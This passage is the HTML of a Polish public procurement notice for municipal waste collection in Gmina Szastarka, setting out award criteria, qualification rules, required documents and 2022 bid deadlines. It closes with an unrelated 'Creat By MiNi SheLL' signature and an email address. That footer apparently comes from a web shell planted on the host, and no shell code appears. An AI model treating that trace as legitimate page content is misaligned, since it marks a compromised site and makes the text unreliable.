selektywnie<br/>Selektywna zbiórka odpadów komunalnych odbywać się będzie<br/>w plastikowych workach określonych w ust. 7 pkt. 3. Worki te zapewnia Wykonawca i dostarcza je w miejsca wskazane<br/>przez Zamawiającego.<br/>Częstotliwość odbioru przez Wykonawcę odpadów zbieranych selektywnie – raz w miesiącu w dni robocze w godzinach od<br/>7:00 do 19:00.<br/>Częstotliwość odbioru przez Wykonawcę bioodpadów zbieranych<br/>w worki z napisem „BIO” odbieranych z nie więcej jak 5% szacowanej liczby posesji – raz w miesiącu w dni robocze<br/>w godzinach od 7:00 do 19:00.<br/>9. Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90513100-7 - Usługi wywozu odpadów pochodzących z gospodarstw domowych</p> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami<br/>oceny ofert:<br/>1) cena o wadze 60 % (Wykonawca poda w formularzu ofertowym stanowiącym załącznik nr 3 do SWZ),<br/>2) termin płatności o wadze 40 % (Wykonawca poda w formularzu ofertowym stanowiącym załącznik nr 3 do SWZ).<br/>2. Każda oferta będzie oceniana w skali 100 pkt.<br/>3. Liczba punktów w kryterium „cena” będzie obliczona na podstawie następującego wzoru:<br/>najniższa zaoferowana cena*<br/>C = ---------------------------------------- x 60 pkt<br/>cena oferty badanej<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>4. Punkty w kryterium „termin płatności” przyznawane będą w następujący sposób:<br/>1) termin płatności wynoszący 14 dni – 0 pkt,<br/>2) termin płatności wynoszący 21 dni – 20 pkt,<br/>3) termin płatności wynoszący 30 dni – 40 pkt,<br/>Uwaga!<br/>Oferowany termin płatności nie może być dłuższy niż 30 dni. W przypadku, gdy Wykonawca nie wskaże oferowanego terminu<br/>płatności Zamawiający uzna, że Wykonawca oferuje termin płatności wynoszący do 14 dni i przyzna Wykonawcy 0 punktów w tym<br/>kryterium.<br/>5. Liczba punktów przyznana ofercie badanej jest sumą punktów otrzymanych<br/>w danej części zamówienia w kryteriach „cena” i „termin płatności”.<br/>6. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie<br/>z zasadami arytmetyki. W przypadku, gdy pomimo różnicy w zaoferowanej cenie, oferty otrzymają w kryterium „cena” taką samą<br/>liczbę punktów, Zamawiający wyliczy punktację z dokładnością do większej liczby miejsc po przecinku.<br/>7. Zamawiający wybierze najkorzystniejszą ofertę tj. z najwyższą liczbą punktów, spośród nieodrzuconych ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>1) posiadania aktualnego wpisu do rejestru działalności regulowanej<br/>w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, o którym mowa w art. 9c ust. 1 ustawy z dnia 13<br/>września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2021 r. poz. 888 ze zm.), w zakresie wszystkich<br/>odpadów objętych niniejszym postępowaniem,<br/>2) podsiadania aktualnego wpisu do rejestru podmiotów gospodarujących odpadami, o których mowa w art. 49 ust. 1 ustawy<br/>z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2021 r. poz. 779 ze zm.) w zakresie objętym przedmiotem zamówienia,<br/>z uwzględnieniem art. 233 ustawy o odpadach, lub ważne zezwolenie na transport odpadów wydane na podstawie<br/>przepisów dotychczasowych w zakresie wszystkich odpadów objętych niniejszym postępowaniem.<br/>W przypadku oferty wspólnej Wykonawców warunek jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie<br/>ubiegających się<br/>o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i<br/>zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej dopuszcza łączne<br/>spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">w celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>1) zaświadczenia o wpisie do rejestru działalności regulowanej<br/>w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, o którym mowa w art. 9c ust. 1 ustawy z dnia 13<br/>września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2021 r. poz. 888 ze zm.), w zakresie wszystkich odpadów<br/>objętych niniejszym postępowaniem, prowadzonego przez Wójta Gminy Szastarka,<br/>2) dokumentu potwierdzającego posiadanie aktualnego wpisu do rejestru podmiotów gospodarujących odpadami, o których mowa w<br/>art. 49 ust. 1 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2021 r. poz. 779 ze zm.) w zakresie objętym przedmiotem<br/>zamówienia, z uwzględnieniem art. 233 ustawy o odpadach, lub ważne zezwolenie na transport odpadów wydane na podstawie<br/>przepisów dotychczasowych w zakresie wszystkich odpadów objętych niniejszym postępowaniem</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">w celu potwierdzenia<br/>braku podstaw wykluczenia z udziału<br/>w postępowaniu:<br/>1) oświadczenie wykonawcy o aktualności informacji zawartych<br/>w oświadczeniu złożonym zgodnie z art. 125 ust. 1 ustawy - załącznika nr 5 do SWZ;<br/>2) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy,<br/>o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji<br/>i konsumentów (Dz. U. z 2021 r., poz. 275), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do<br/>tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego<br/>wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 6 do SWZ;<br/>3) odpis lub informacja z Krajowego Rejestru Sądowego lub<br/>z Centralnej Ewidencji i Informacji o Działalności Gospodarczej,<br/>w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu,<br/>o których mowa w ust. 4 lit. A pkt 3, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę<br/>lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego<br/>aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest<br/>zawieszona ani nie znajduje się on<br/>w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej<br/>w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej<br/>niż 3 miesięcy przed upływem terminu składania ofert.<br/>6. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa<br/>w ust. 4 lit. A pkt 3, zastępuje się je<br/>w całości lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo<br/>organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania<br/>Wykonawcy.<br/>7. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>1) może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile<br/>Wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp dane umożliwiające dostęp do tych<br/>środków;<br/>2) podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym<br/>mowa w art. 125 ust. 1.<br/>8. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli<br/>Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>9. W zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ do oświadczeń<br/>i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia<br/>Ministra Rozwoju, Pracy<br/>i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy oraz rozporządzenia Prezesa Rady Ministrów<br/>z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich<br/>w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi<br/>zostać załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale 9 ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>UWAGA: Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika,<br/>które usługi wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 8 do SWZ.<br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia<br/>z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art. 454-455 ustawy oraz postanowień Projektu Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy zakupowej https://gminaszastarka.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-12 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com